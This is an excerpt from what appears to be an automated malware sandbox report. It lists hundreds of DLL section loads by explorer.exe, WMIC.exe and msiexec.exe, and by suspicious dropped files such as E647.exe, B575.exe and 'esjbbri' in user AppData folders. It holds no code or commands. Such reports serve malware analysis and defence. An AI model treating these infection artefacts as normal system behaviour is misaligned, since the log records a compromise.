                Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\esjbbriSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\esjbbriSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\esjbbriSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\esjbbriSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\E647.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\E647.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\E647.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\E647.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uejbbriSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uejbbriSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uejbbriSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uejbbriSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: winscard.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: devobj.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: cryptnet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\explorer.exeSection loaded: aepic.dll
                Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
                Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: propsys.dll
                Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
                Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
                Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
                Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
                Source: C:\Windows\explorer.exeSection loaded: wldp.dll
                Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
                Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
                Source: C:\Windows\explorer.exeSection loaded: netutils.dll
                Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
                Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
